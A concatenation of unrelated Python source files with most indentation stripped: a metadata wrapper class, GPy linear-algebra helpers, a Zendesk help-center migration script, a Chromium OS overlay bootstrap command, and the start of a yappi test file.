core.BNMetadataArrayAppend(self.handle, md.handle)
elif isinstance(value, dict):
self.handle = core.BNCreateMetadataOfType(MetadataType.KeyValueDataType)
for elm in value:
md = Metadata(value[elm], signed, raw)
core.BNMetadataSetValueForKey(self.handle, str(elm), md.handle)
else:
            raise ValueError("unsupported type {}: expected int, bool, str, bytes, float, list or dict".format(type(value).__name__))
def __len__(self):
if self.is_array or self.is_dict or self.is_string or self.is_raw:
return core.BNMetadataSize(self.handle)
raise Exception("Metadata object doesn't support len()")
def __eq__(self, other):
if isinstance(other, int) and self.is_integer:
return int(self) == other
elif isinstance(other, str) and (self.is_string or self.is_raw):
return str(self) == other
elif isinstance(other, float) and self.is_float:
return float(self) == other
elif isinstance(other, bool) and self.is_boolean:
return bool(self) == other
elif self.is_array and ((isinstance(other, Metadata) and other.is_array) or isinstance(other, list)):
if len(self) != len(other):
return False
for a, b in zip(self, other):
if a != b:
return False
return True
elif self.is_dict and ((isinstance(other, Metadata) and other.is_dict) or isinstance(other, dict)):
if len(self) != len(other):
return False
for a, b in zip(self, other):
if a != b or self[a] != other[b]:
return False
return True
elif isinstance(other, Metadata) and self.is_integer and other.is_integer:
return int(self) == int(other)
elif isinstance(other, Metadata) and (self.is_string or self.is_raw) and (other.is_string or other.is_raw):
return str(self) == str(other)
elif isinstance(other, Metadata) and self.is_float and other.is_float:
return float(self) == float(other)
elif isinstance(other, Metadata) and self.is_boolean and other.is_boolean:
return bool(self) == bool(other)
return NotImplemented
def __ne__(self, other):
if isinstance(other, int) and self.is_integer:
return int(self) != other
elif isinstance(other, str) and (self.is_string or self.is_raw):
return str(self) != other
elif isinstance(other, float) and self.is_float:
return float(self) != other
elif isinstance(other, bool):
return bool(self) != other
elif self.is_array and ((isinstance(other, Metadata) and other.is_array) or isinstance(other, list)):
if len(self) != len(other):
return True
areEqual = True
for a, b in zip(self, other):
if a != b:
areEqual = False
return not areEqual
elif self.is_dict and ((isinstance(other, Metadata) and other.is_dict) or isinstance(other, dict)):
if len(self) != len(other):
return True
for a, b in zip(self, other):
if a != b or self[a] != other[b]:
return True
return False
elif isinstance(other, Metadata) and self.is_integer and other.is_integer:
return int(self) != int(other)
elif isinstance(other, Metadata) and (self.is_string or self.is_raw) and (other.is_string or other.is_raw):
return str(self) != str(other)
elif isinstance(other, Metadata) and self.is_float and other.is_float:
return float(self) != float(other)
elif isinstance(other, Metadata) and self.is_boolean and other.is_boolean:
return bool(self) != bool(other)
return NotImplemented
def __iter__(self):
if self.is_array:
for i in range(core.BNMetadataSize(self.handle)):
yield Metadata(handle=core.BNMetadataGetForIndex(self.handle, i)).value
elif self.is_dict:
result = core.BNMetadataGetValueStore(self.handle)
try:
for i in range(result.contents.size):
if isinstance(result.contents.keys[i], bytes):
yield str(pyNativeStr(result.contents.keys[i]))
else:
yield result.contents.keys[i]
finally:
core.BNFreeMetadataValueStore(result)
else:
raise Exception("Metadata object doesn't support iteration")
def __getitem__(self, value):
if self.is_array:
if not isinstance(value, int):
raise ValueError("Metadata object only supports integers for indexing")
if value >= len(self):
raise IndexError("Index value out of range")
return Metadata(handle=core.BNMetadataGetForIndex(self.handle, value)).value
if self.is_dict:
if not isinstance(value, str):
raise ValueError("Metadata object only supports strings for indexing")
handle = core.BNMetadataGetForKey(self.handle, value)
if handle is None:
raise KeyError(value)
return Metadata(handle=handle).value
raise NotImplementedError("Metadata object doesn't support indexing")
def __str__(self):
if self.is_string:
return str(core.BNMetadataGetString(self.handle))
if self.is_raw:
length = ctypes.c_ulonglong()
length.value = 0
native_list = core.BNMetadataGetRaw(self.handle, ctypes.byref(length))
out_list = []
for i in range(length.value):
out_list.append(native_list[i])
core.BNFreeMetadataRaw(native_list)
return ''.join(chr(a) for a in out_list)
raise ValueError("Metadata object not a string or raw type")
def __bytes__(self):
return bytes(bytearray(ord(i) for i in self.__str__()))
def __int__(self):
if self.is_signed_integer:
return core.BNMetadataGetSignedInteger(self.handle)
if self.is_unsigned_integer:
return core.BNMetadataGetUnsignedInteger(self.handle)
raise ValueError("Metadata object not of integer type")
def __float__(self):
if not self.is_float:
raise ValueError("Metadata object is not float type")
return core.BNMetadataGetDouble(self.handle)
def __nonzero__(self):
if not self.is_boolean:
raise ValueError("Metadata object is not boolean type")
return core.BNMetadataGetBoolean(self.handle)
@property
def value(self):
if self.is_integer:
return int(self)
elif self.is_string:
return str(self)
elif self.is_raw:
return bytes(self)
elif self.is_float:
return float(self)
elif self.is_boolean:
return bool(self)
elif self.is_array:
return list(self)
elif self.is_dict:
return self.get_dict()
raise TypeError()
def get_dict(self):
if not self.is_dict:
raise TypeError()
result = {}
for key in self:
result[key] = self[key]
return result
@property
def type(self):
return MetadataType(core.BNMetadataGetType(self.handle))
@property
def is_integer(self):
return self.is_signed_integer or self.is_unsigned_integer
@property
def is_signed_integer(self):
return core.BNMetadataIsSignedInteger(self.handle)
@property
def is_unsigned_integer(self):
return core.BNMetadataIsUnsignedInteger(self.handle)
@property
def is_float(self):
return core.BNMetadataIsDouble(self.handle)
@property
def is_boolean(self):
return core.BNMetadataIsBoolean(self.handle)
@property
def is_string(self):
return core.BNMetadataIsString(self.handle)
@property
def is_raw(self):
return core.BNMetadataIsRaw(self.handle)
@property
def is_array(self):
return core.BNMetadataIsArray(self.handle)
@property
def is_dict(self):
return core.BNMetadataIsKeyValueStore(self.handle)
def remove(self, key_or_index):
if isinstance(key_or_index, str) and self.is_dict:
core.BNMetadataRemoveKey(self.handle, key_or_index)
elif isinstance(key_or_index, int) and self.is_array:
core.BNMetadataRemoveIndex(self.handle, key_or_index)
else:
raise TypeError("remove only valid for dict and array objects")
|
|
# Copyright (c) 2012, GPy authors (see AUTHORS.txt).
# Licensed under the BSD 3-clause license (see LICENSE.txt)
# tdot function courtesy of Ian Murray:
# Iain Murray, April 2013. iain contactable via iainmurray.net
# http://homepages.inf.ed.ac.uk/imurray2/code/tdot/tdot.py
import numpy as np
from scipy import linalg
from scipy.linalg import lapack, blas
from .config import config
import logging
try:
from . import linalg_cython
config.set('cython', 'working', 'True')
except ImportError:
config.set('cython', 'working', 'False')
def force_F_ordered_symmetric(A):
"""
return a F ordered version of A, assuming A is symmetric
"""
if A.flags['F_CONTIGUOUS']:
return A
if A.flags['C_CONTIGUOUS']:
return A.T
else:
return np.asfortranarray(A)
def force_F_ordered(A):
"""
return a F ordered version of A, assuming A is triangular
"""
if A.flags['F_CONTIGUOUS']:
return A
print("why are your arrays not F order?")
return np.asfortranarray(A)
# def jitchol(A, maxtries=5):
# A = force_F_ordered_symmetric(A)
# L, info = lapack.dpotrf(A, lower=1)
# if info == 0:
# return L
# else:
# if maxtries==0:
# raise linalg.LinAlgError, "not positive definite, even with jitter."
# diagA = np.diag(A)
# if np.any(diagA <= 0.):
# raise linalg.LinAlgError, "not pd: non-positive diagonal elements"
# jitter = diagA.mean() * 1e-6
# return jitchol(A+np.eye(A.shape[0])*jitter, maxtries-1)
def jitchol(A, maxtries=5):
A = np.ascontiguousarray(A)
L, info = lapack.dpotrf(A, lower=1)
if info == 0:
return L
else:
diagA = np.diag(A)
if np.any(diagA <= 0.):
raise linalg.LinAlgError("not pd: non-positive diagonal elements")
jitter = diagA.mean() * 1e-6
        num_tries = 1
        while num_tries <= maxtries and np.isfinite(jitter):
            try:
                L = linalg.cholesky(A + np.eye(A.shape[0]) * jitter, lower=True)
                logging.warning('Added jitter of %.10e to the diagonal', jitter)
                return L
            except linalg.LinAlgError:
                jitter *= 10
            finally:
                num_tries += 1
        raise linalg.LinAlgError("not positive definite, even with jitter.")
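
# Illustrative check of the jitter fallback (not part of the GPy API):
#
#     A = np.ones((3, 3))       # rank-1 PSD, so a plain Cholesky fails
#     L = jitchol(A)            # succeeds after adding diagonal jitter
#     assert np.allclose(L.dot(L.T), A, atol=1e-4)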
# def dtrtri(L, lower=1):
# """
# Wrapper for lapack dtrtri function
# Inverse of L
#
# :param L: Triangular Matrix L
# :param lower: is matrix lower (true) or upper (false)
# :returns: Li, info
# """
# L = force_F_ordered(L)
# return lapack.dtrtri(L, lower=lower)
def dtrtrs(A, B, lower=1, trans=0, unitdiag=0):
"""
Wrapper for lapack dtrtrs function
DTRTRS solves a triangular system of the form
A * X = B or A**T * X = B,
where A is a triangular matrix of order N, and B is an N-by-NRHS
matrix. A check is made to verify that A is nonsingular.
:param A: Matrix A(triangular)
:param B: Matrix B
:param lower: is matrix lower (true) or upper (false)
:returns: Solution to A * X = B or A**T * X = B
"""
A = np.asfortranarray(A)
#Note: B does not seem to need to be F ordered!
return lapack.dtrtrs(A, B, lower=lower, trans=trans, unitdiag=unitdiag)
def dpotrs(A, B, lower=1):
"""
Wrapper for lapack dpotrs function
:param A: Matrix A
:param B: Matrix B
:param lower: is matrix lower (true) or upper (false)
:returns:
"""
A = force_F_ordered(A)
return lapack.dpotrs(A, B, lower=lower)
def dpotri(A, lower=1):
"""
Wrapper for lapack dpotri function
DPOTRI - compute the inverse of a real symmetric positive
definite matrix A using the Cholesky factorization A =
U**T*U or A = L*L**T computed by DPOTRF
:param A: Matrix A
:param lower: is matrix lower (true) or upper (false)
:returns: A inverse
"""
A = force_F_ordered(A)
R, info = lapack.dpotri(A, lower=lower) #needs to be zero here, seems to be a scipy bug
symmetrify(R)
return R, info
def pddet(A):
"""
    Log-determinant of a positive definite matrix; only symmetric matrices are supported.
"""
L = jitchol(A)
logdetA = 2*sum(np.log(np.diag(L)))
return logdetA
def trace_dot(a, b):
"""
Efficiently compute the trace of the matrix product of a and b
"""
return np.einsum('ij,ji->', a, b)
def mdot(*args):
"""
Multiply all the arguments using matrix product rules.
The output is equivalent to multiplying the arguments one by one
from left to right using dot().
Precedence can be controlled by creating tuples of arguments,
    for instance mdot(a,((b,c),d)) multiplies as a*((b*c)*d).
Note that this means the output of dot(a,b) and mdot(a,b) will differ if
a or b is a pure tuple of numbers.
"""
if len(args) == 1:
return args[0]
elif len(args) == 2:
return _mdot_r(args[0], args[1])
else:
return _mdot_r(args[:-1], args[-1])
def _mdot_r(a, b):
"""Recursive helper for mdot"""
if type(a) == tuple:
if len(a) > 1:
a = mdot(*a)
else:
a = a[0]
if type(b) == tuple:
if len(b) > 1:
b = mdot(*b)
else:
b = b[0]
return np.dot(a, b)
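
# Precedence sketch for mdot (illustrative):
#
#     a, b, c = (np.random.randn(3, 3) for _ in range(3))
#     assert np.allclose(mdot(a, b, c), a.dot(b).dot(c))
#     assert np.allclose(mdot(a, (b, c)), a.dot(b.dot(c)))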
def pdinv(A, *args):
"""
:param A: A DxD pd numpy array
:rval Ai: the inverse of A
:rtype Ai: np.ndarray
:rval L: the Cholesky decomposition of A
:rtype L: np.ndarray
:rval Li: the Cholesky decomposition of Ai
:rtype Li: np.ndarray
:rval logdet: the log of the determinant of A
:rtype logdet: float64
"""
L = jitchol(A, *args)
logdet = 2.*np.sum(np.log(np.diag(L)))
Li = dtrtri(L)
Ai, _ = dpotri(L, lower=1)
# Ai = np.tril(Ai) + np.tril(Ai,-1).T
symmetrify(Ai)
return Ai, L, Li, logdet
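
# Sanity-check sketch for pdinv (illustrative):
#
#     A = np.random.randn(5, 3); A = A.dot(A.T) + 5. * np.eye(5)
#     Ai, L, Li, logdet = pdinv(A)
#     assert np.allclose(Ai, np.linalg.inv(A))
#     assert np.allclose(Ai, Li.T.dot(Li))      # A^-1 = L^-T L^-1
#     assert np.allclose(logdet, np.linalg.slogdet(A)[1])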
def dtrtri(L):
"""
Inverts a Cholesky lower triangular matrix
:param L: lower triangular matrix
    :returns: inverse of L
"""
L = force_F_ordered(L)
return lapack.dtrtri(L, lower=1)[0]
def multiple_pdinv(A):
"""
:param A: A DxDxN numpy array (each A[:,:,i] is pd)
:rval invs: the inverses of A
:rtype invs: np.ndarray
:rval hld: 0.5* the log of the determinants of A
:rtype hld: np.array
"""
N = A.shape[-1]
chols = [jitchol(A[:, :, i]) for i in range(N)]
halflogdets = [np.sum(np.log(np.diag(L[0]))) for L in chols]
invs = [dpotri(L[0], True)[0] for L in chols]
invs = [np.triu(I) + np.triu(I, 1).T for I in invs]
return np.dstack(invs), np.array(halflogdets)
def pca(Y, input_dim):
"""
Principal component analysis: maximum likelihood solution by SVD
:param Y: NxD np.array of data
:param input_dim: int, dimension of projection
:rval X: - Nxinput_dim np.array of dimensionality reduced data
:rval W: - input_dimxD mapping from X to Y
"""
if not np.allclose(Y.mean(axis=0), 0.0):
print("Y is not zero mean, centering it locally (GPy.util.linalg.pca)")
# Y -= Y.mean(axis=0)
Z = linalg.svd(Y - Y.mean(axis=0), full_matrices=False)
[X, W] = [Z[0][:, 0:input_dim], np.dot(np.diag(Z[1]), Z[2]).T[:, 0:input_dim]]
v = X.std(axis=0)
X /= v
W *= v
return X, W.T
def ppca(Y, Q, iterations=100):
"""
EM implementation for probabilistic pca.
:param array-like Y: Observed Data
:param int Q: Dimensionality for reduced array
:param int iterations: number of iterations for EM
"""
from numpy.ma import dot as madot
N, D = Y.shape
# Initialise W randomly
W = np.random.randn(D, Q) * 1e-3
Y = np.ma.masked_invalid(Y, copy=0)
mu = Y.mean(0)
Ycentered = Y - mu
try:
for _ in range(iterations):
exp_x = np.asarray_chkfinite(np.linalg.solve(W.T.dot(W), madot(W.T, Ycentered.T))).T
W = np.asarray_chkfinite(np.linalg.solve(exp_x.T.dot(exp_x), madot(exp_x.T, Ycentered))).T
except np.linalg.linalg.LinAlgError:
#"converged"
pass
return np.asarray_chkfinite(exp_x), np.asarray_chkfinite(W)
def tdot_numpy(mat, out=None):
return np.dot(mat, mat.T, out)
def tdot_blas(mat, out=None):
"""returns np.dot(mat, mat.T), but faster for large 2D arrays of doubles."""
if (mat.dtype != 'float64') or (len(mat.shape) != 2):
return np.dot(mat, mat.T)
nn = mat.shape[0]
if out is None:
out = np.zeros((nn, nn))
else:
assert(out.dtype == 'float64')
assert(out.shape == (nn, nn))
# FIXME: should allow non-contiguous out, and copy output into it:
assert(8 in out.strides)
# zeroing needed because of dumb way I copy across triangular answer
out[:] = 0.0
# # Call to DSYRK from BLAS
mat = np.asfortranarray(mat)
out = blas.dsyrk(alpha=1.0, a=mat, beta=0.0, c=out, overwrite_c=1,
trans=0, lower=0)
symmetrify(out, upper=True)
return np.ascontiguousarray(out)
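
# Equivalence sketch for tdot_blas (illustrative):
#
#     M = np.random.randn(100, 20)
#     assert np.allclose(tdot_blas(M), M.dot(M.T))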
def tdot(*args, **kwargs):
return tdot_blas(*args, **kwargs)
def DSYR_blas(A, x, alpha=1.):
"""
Performs a symmetric rank-1 update operation:
A <- A + alpha * np.dot(x,x.T)
:param A: Symmetric NxN np.array
:param x: Nx1 np.array
:param alpha: scalar
"""
A = blas.dsyr(lower=0, x=x, a=A, alpha=alpha, overwrite_a=True)
symmetrify(A, upper=True)
def DSYR_numpy(A, x, alpha=1.):
"""
Performs a symmetric rank-1 update operation:
A <- A + alpha * np.dot(x,x.T)
:param A: Symmetric NxN np.array
:param x: Nx1 np.array
:param alpha: scalar
"""
A += alpha * np.dot(x[:, None], x[None, :])
def DSYR(*args, **kwargs):
return DSYR_blas(*args, **kwargs)
def symmetrify(A, upper=False):
"""
    Take the square matrix A and make it symmetric by copying elements from
    the lower half to the upper (or from the upper to the lower if upper=True).
    Works IN PLACE.
note: tries to use cython, falls back to a slower numpy version
"""
if config.getboolean('cython', 'working'):
_symmetrify_cython(A, upper)
else:
_symmetrify_numpy(A, upper)
def _symmetrify_cython(A, upper=False):
return linalg_cython.symmetrify(A, upper)
def _symmetrify_numpy(A, upper=False):
triu = np.triu_indices_from(A,k=1)
if upper:
A.T[triu] = A[triu]
else:
A[triu] = A.T[triu]
def backsub_both_sides(L, X, transpose='left'):
"""
    Return L^-T * X * L^-1, assuming X is symmetric and L is a lower Cholesky factor
"""
if transpose == 'left':
tmp, _ = dtrtrs(L, X, lower=1, trans=1)
return dtrtrs(L, tmp.T, lower=1, trans=1)[0].T
else:
tmp, _ = dtrtrs(L, X, lower=1, trans=0)
return dtrtrs(L, tmp.T, lower=1, trans=0)[0].T
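
# backsub_both_sides sketch (illustrative):
#
#     L = np.tril(np.random.randn(4, 4)) + 4. * np.eye(4)
#     X = np.random.randn(4, 4); X = X + X.T
#     expected = np.linalg.inv(L).T.dot(X).dot(np.linalg.inv(L))
#     assert np.allclose(backsub_both_sides(L, X), expected)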
def ij_jlk_to_ilk(A, B):
"""
Faster version of einsum 'ij,jlk->ilk'
"""
return A.dot(B.reshape(B.shape[0], -1)).reshape(A.shape[0], B.shape[1], B.shape[2])
def ijk_jlk_to_il(A, B):
"""
Faster version of einsum einsum('ijk,jlk->il', A,B)
"""
res = np.zeros((A.shape[0], B.shape[1]))
[np.add(np.dot(A[:,:,k], B[:,:,k]), res, out=res) for k in range(B.shape[-1])]
return res
def ijk_ljk_to_ilk(A, B):
"""
Faster version of einsum np.einsum('ijk,ljk->ilk', A, B)
I.e A.dot(B.T) for every dimension
"""
res = np.zeros((A.shape[-1], A.shape[0], B.shape[0]))
[np.dot(A[:,:,i], B[:,:,i].T, out=res[i,:,:]) for i in range(A.shape[-1])]
res = res.swapaxes(0, 2).swapaxes(0,1)
return res
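
# Equivalence sketch for the einsum shortcuts (illustrative):
#
#     A = np.random.randn(4, 5); B = np.random.randn(5, 6, 7)
#     assert np.allclose(ij_jlk_to_ilk(A, B), np.einsum('ij,jlk->ilk', A, B))
#     C = np.random.randn(4, 5, 7)
#     assert np.allclose(ijk_jlk_to_il(C, B), np.einsum('ijk,jlk->il', C, B))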
|
|
#original https://github.com/trailbehind/zendesk-utils/tree/master/uservoice_to_zendesk
import requests, json
class ZendeskToZenDeskImporter:
'''
    Transfer articles, sections, and categories from an old Zendesk Help Center to a new one.
'''
def __init__(self):
#setup old zendesk client
self.origin_brand = 'YourOldBrand'
self.origin_zendesk = "https://{}.zendesk.com".format(self.origin_brand)
self.sections = self.origin_zendesk + '/api/v2/help_center/en-us/sections.json'
self.categories = self.origin_zendesk + '/api/v2/help_center/en-us/categories.json'
self.origin_username = 'YourEmail' + '/token'
self.origin_token = 'Origin_API_TOKEN'
self.origin_credentials = (self.origin_username, self.origin_token)
#setup new zendesk client
self.new_brand = 'YourNewBrand'
self.zendesk_url = "https://{}.zendesk.com".format(self.new_brand)
self.new_username = 'YourEmail' + '/token'
self.new_token = 'New_API_Token'
self.credentials = (self.new_username, self.new_token)
#other stuff
self.headers = {'content-type': 'application/json'}
self.language = 'en-us'
# keep track of sections we create in zendesk, to minimize the number of API requests
self.local_sections = {}
def post_articles(self):
'''
fetch articles from origin_brand and post them to new_brand
'''
url = "https://{}.zendesk.com/api/v2/help_center/en-us/articles.json".format(self.origin_brand)
articles_list = []
while url:
response = requests.get(url, auth=self.origin_credentials)
if response.status_code != 200:
print('Status:', response.status_code, 'Problem with the request. Exiting.')
exit()
data = response.json()
for article in data['articles']:
articles_list.append(article)
url = data['next_page']
print "**POSTING ALL ARTICLES, one-by-one since Zendesk help center API won't do bulk"
for article in articles_list:
            if not article['section_id']:
                print("SKIPPED ARTICLE {}, NO TOPIC".format(article['title']))
                continue
            if article['draft'] is not False:
                print("SKIPPED ARTICLE in {} because it was unpublished".format(article['section_id']))
                continue
            if article['section_id'] in self.local_sections:
                section_id = self.local_sections[article['section_id']]
            else:
                section_id = self.get_section_name(article['section_id'])
                # cache by origin section id so later articles skip the lookups
                self.local_sections[article['section_id']] = section_id
            if self.get_article_for_title(article['title'], section_id):
                print('SKIPPED, {} already exists'.format(article['title']))
                continue
info = {
'title': article['title'],
'language': self.language,
'position': article['position'],
'body': article['body']
}
payload = json.dumps({'article': info})
url = '{}/api/v2/help_center/sections/{}/articles.json'.format(self.zendesk_url, section_id)
response = requests.post(url, data=payload, headers=self.headers, auth=self.credentials)
if response.status_code != 200 and response.status_code != 201:
print('FAILED to add article with error {}'.format(response.status_code))
exit()
else:
print('ADDED ARTICLE {}'.format(response.json()['article']['title']))
def get_article_for_title(self, title, section_id):
'''
        returns the article id if there is already an article with this title
returns None otherwise
'''
url = '{}/api/v2/help_center/sections/{}/articles.json'.format(self.zendesk_url, section_id)
response = requests.get(url, headers=self.headers, auth=self.credentials)
if response.status_code != 200:
print('FAILED to get article list with error {}'.format(response.status_code))
exit()
articles = response.json()['articles']
for article in articles:
if article['title'] == title:
return article['id']
return None
def get_section_name(self, section_id):
response = requests.get(self.sections, auth=self.origin_credentials)
if response.status_code != 200:
print('Status:', response.status_code, 'Problem with the request. Exiting.')
exit()
data = response.json()
sections_list = data['sections']
for section in sections_list:
if section['id'] == section_id:
name = section['name']
position = section['position']
category_name = self.get_category_name(section['category_id'])
category = self.get_or_create_category(category_name)
return self.create_or_get_section_id_for_name(name, position, category)
def get_category_name(self, category_id):
response = requests.get(self.categories, auth=self.origin_credentials)
if response.status_code != 200:
print('Status:', response.status_code, 'Problem with the request. Exiting.')
exit()
data = response.json()
categories_list = data['categories']
for category in categories_list:
if category['id'] == category_id:
category_name = category['name']
return category_name
def create_or_get_section_id_for_name(self, name, position, category):
'''
given a section name, return its id or creates a new section and return its id
'''
url = '{}/api/v2/help_center/categories/{}/sections.json'.format(self.zendesk_url, category)
response = requests.get(url, headers=self.headers, auth=self.credentials)
if response.status_code != 200:
print('FAILED to get section list with error {}'.format(response.status_code))
exit()
data = response.json()
sections_list = data['sections']
for section in sections_list:
if section['name'] == name:
return section['id']
return self.create_section(name, position, category)
def create_section(self, name, position, category):
'''
create a section for a given name and return its id
'''
info = {
'name': name,
'position': position,
}
payload = json.dumps({'section': info})
url = '{}/api/v2/help_center/categories/{}/sections.json'.format(self.zendesk_url, category)
response = requests.post(url, data=payload, headers=self.headers, auth=self.credentials)
if response.status_code != 201:
print('FAILED to create section {} with error {}'.format(name, response.status_code))
exit()
section = response.json()['section']
print('ADDED SECTION {}'.format(section['name']))
return section['id']
def get_or_create_category(self, name):
'''
given a category name, return its id or creates a new category and return its id
'''
url = '{}/api/v2/help_center/categories.json'.format(self.zendesk_url)
response = requests.get(url, headers=self.headers, auth=self.credentials)
if response.status_code != 200:
print('FAILED to get category list with error {}'.format(response.status_code))
exit()
categories = response.json()['categories']
for category in categories:
if category['name'] == name:
return category['id']
return self.create_category(name)
def create_category(self, name):
'''
create a category for a given name and return its id
'''
info = {
'name': name
}
payload = json.dumps({'category': info})
url = '{}/api/v2/help_center/categories.json'.format(self.zendesk_url)
response = requests.post(url, data=payload, headers=self.headers, auth=self.credentials)
if response.status_code != 201:
print('FAILED to create category {} with error {}'.format(name, response.status_code))
exit()
category = response.json()['category']
print('ADDED CATEGORY {}'.format(category['name']))
return category['id']
if __name__ == '__main__':
    importer = ZendeskToZenDeskImporter()
    importer.post_articles()
|
|
# Copyright 2014 The Chromium OS Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""cros bootstrap-overlay: Create an overlay based on an existing one."""
from __future__ import print_function
from datetime import date
from distutils import dir_util
import logging
import os
from chromite.cbuildbot import constants
from chromite.lib import cros_build_lib, osutils
from chromite import cros
BSP_VIRTUAL_TEMPLATE = \
"""# Copyright %(year)s The Chromium OS Authors. All rights reserved.
# Distributed under the terms of the GNU General Public License v2
EAPI=4
DESCRIPTION="Board specific definition for %(board)s"
HOMEPAGE="http://dev.chromium.org/"
LICENSE="BSD-Google"
SLOT="0"
KEYWORDS="*"
IUSE=""
RDEPEND="chromeos-base/chromeos-bsp-%(board)s"
"""
BSP_IMPL_TEMPLATE = \
"""# Copyright %(year)s The Chromium OS Authors. All rights reserved.
# Distributed under the terms of the GNU General Public License v2
EAPI=4
DESCRIPTION="%(board)s bsp"
LICENSE="BSD-Google"
SLOT="0"
KEYWORDS="*"
IUSE=""
RDEPEND="
%(app_atom)s
"
"""
def CreateBsp(overlay_name, overlay_path, app_atom):
"""Create virtual/bsp and its implementation in overlay_name.
Args:
overlay_name: name of the overlay (board name).
overlay_path: path to the overlay.
app_atom: target atom for the app.
"""
bsp_virtual = os.path.join(overlay_path, 'virtual', 'chromeos-bsp',
'chromeos-bsp-2.ebuild')
osutils.WriteFile(bsp_virtual,
BSP_VIRTUAL_TEMPLATE % {'year': date.today().year,
'board': overlay_name},
makedirs=True)
bsp_impl = os.path.join(overlay_path,
'chromeos-base',
'chromeos-bsp-%s' % overlay_name,
'chromeos-bsp-%s-0.0.1.ebuild' % overlay_name)
osutils.WriteFile(bsp_impl,
BSP_IMPL_TEMPLATE % {'year':date.today().year,
'board': overlay_name,
'app_atom': app_atom},
makedirs=True)
os.symlink(os.path.basename(bsp_impl),
os.path.join(os.path.dirname(bsp_impl),
'chromeos-bsp-%s-0.0.1-r1.ebuild' % overlay_name))
def GetBspEbuild(overlay_path, board_name):
"""Return the path to the ebuild implementing chromeos-bsp.
This assumes that the bsp implementation package is called chromeos-bsp-$BOARD
where $BOARD is the board name.
Args:
overlay_path: path of the overlay.
board_name: name of the overlay.
Returns:
The path to the ebuild implementing chromeos-bsp if it exists,
None otherwise.
"""
bsp_name = 'chromeos-bsp-%s' % board_name
bsp_impl_dir = os.path.join(overlay_path, 'chromeos-base', bsp_name)
for filename in os.listdir(bsp_impl_dir):
filepath = os.path.join(bsp_impl_dir, filename)
# Assume the first regular file whose name matches
# chromeos-bsp-$BOARD.*.ebuild is the bsp ebuild.
if filename.startswith(bsp_name) and filename.endswith(".ebuild") and \
os.path.isfile(filepath) and not os.path.islink(filepath):
return filepath
return None
def UpdateCrosBoard(board_name):
"""Add the board name to the list of board names in cros-board.eclass.
Note: This will break the ordering of the list but this code is simpler and
less error prone.
Args:
board_name: name to add in cros-board.eclass.
"""
cros_board = os.path.join(constants.SOURCE_ROOT, 'src', 'third_party',
'chromiumos-overlay', 'eclass',
'cros-board.eclass')
content = osutils.ReadFile(cros_board)
osutils.WriteFile(cros_board,
content.replace('ALL_BOARDS=(',
'ALL_BOARDS=(\n\t%s' % board_name))
def UpdateLayout(overlay_dir, repo_name):
"""Set the correct repo name field in metadata/layout.conf.
Args:
overlay_dir: path to the overlay.
repo_name: name of the repo.
"""
layout_conf_path = os.path.join(overlay_dir, 'metadata', 'layout.conf')
layout_conf = osutils.ReadFile(layout_conf_path).split('\n')
layout_conf = [line for line in layout_conf \
if not line.startswith('repo-name')]
layout_conf.append('repo-name = %s' % repo_name)
osutils.WriteFile(layout_conf_path, '\n'.join(layout_conf))
def RemoveLegacyRepoName(overlay_dir):
"""Remove the file profiles/repo_name if it exists.
Args:
overlay_dir: path to the overlay.
"""
repo_name_file = os.path.join(overlay_dir, 'profiles', 'repo_name')
if os.path.isfile(repo_name_file):
    logging.warning('Replacing deprecated repo_name with layout.conf.')
os.remove(repo_name_file)
@cros.CommandDecorator('bootstrap-overlay')
class BootstrapOverlayCommand(cros.CrosCommand):
"""Create a new overlay based on an existing one."""
EPILOG = """
To create new overlay from an existing one:
cros bootstrap-overlay gizmo myboard
To bootstrap an overlay and copy an example app:
cros bootstrap-overlay gizmo myboard --app=helloworld
which is equivalent to:
cros bootstrap-overlay gizmo myboard --app=~/trunk/src/overlays/helloworld
"""
def __init__(self, options):
cros.CrosCommand.__init__(self, options)
self.app_dir = None
self.app_atom = None
self.seed_dir = None
self.overlay_dir = None
@classmethod
def AddParser(cls, parser):
    super(BootstrapOverlayCommand, cls).AddParser(parser)
default_board = cros_build_lib.GetDefaultBoard()
parser.add_argument('seed', help='Name of the overlay to use as seed',
default=default_board)
parser.add_argument('board', help='Name of the new overlay')
parser.add_argument('--app', help='App to install in the new overlay. '
'This can be the name of a directory in src/overlays '
'or the path to the app.',
default=None)
def _ValidateOptions(self):
overlays = os.path.join(constants.SOURCE_ROOT, 'src', 'overlays')
# The destination overlay must not exist.
self.overlay_dir = os.path.join(overlays, 'overlay-' + self.options.board)
if os.path.isdir(self.overlay_dir):
cros_build_lib.Die('The overlay directory %s already exists.' %
self.overlay_dir)
# The seed overlay must exist.
self.seed_dir = os.path.join(overlays, 'overlay-' + self.options.seed)
if not os.path.isdir(self.seed_dir):
cros_build_lib.Die('The seed overlay %s could not be found.'
% self.seed_dir)
# The app must be:
# * the name of a directory in src/overlay.
# * a path to an existing directory.
if self.options.app:
if os.path.isdir(self.options.app):
self.app_dir = self.options.app
self.app_atom = 'app-misc/' + os.path.basename(self.app_dir.rstrip('/'))
elif os.path.isdir(os.path.join(overlays, self.options.app)):
self.app_dir = os.path.join(overlays, self.options.app)
self.app_atom = 'app-misc/' + self.options.app
else:
        cros_build_lib.Die('app %(app_name)s invalid. The app name must be '
                           'a folder in %(overlay)s or a path to a directory.'
                           % {'app_name': self.options.app,
                              'overlay': overlays})
def _InstallApp(self, destination):
"""Install the app in |destination|.
Args:
destination: destination directory.
"""
dir_util.copy_tree(self.app_dir, destination, preserve_symlinks=True)
# Add the main ebuild to the bsp.
bsp_file = GetBspEbuild(destination, self.options.seed)
if bsp_file is not None and os.path.isfile(bsp_file):
osutils.WriteFile(bsp_file,
'\nRDEPEND="${RDEPEND} %s"' % self.app_atom,
mode='a')
else:
logging.info('No bsp package was found, creating one from scratch.')
CreateBsp(self.options.board, destination, self.app_atom)
def Run(self):
"""Run cros bootstrap-overlay."""
self.options.Freeze()
self._ValidateOptions()
with osutils.TempDir() as tmp_overlay:
dir_util.copy_tree(self.seed_dir, tmp_overlay, preserve_symlinks=True)
RemoveLegacyRepoName(tmp_overlay)
UpdateLayout(tmp_overlay, self.options.board)
if self.app_dir:
self._InstallApp(tmp_overlay)
# TODO(bsimonnet): remove this once the dependency on cros-board.eclass
# is removed (http://crbug.com/407731).
UpdateCrosBoard(self.options.board)
dir_util.copy_tree(tmp_overlay, self.overlay_dir, preserve_symlinks=True)
|
|
import os
import sys
import time
import yappi
import _yappi
import utils
import multiprocessing # added to fix http://bugs.python.org/issue15881 for > Py2.6
if sys.version_info < (2, 7): # use unittest2 for < Py2.7
import unittest2 as _unittest
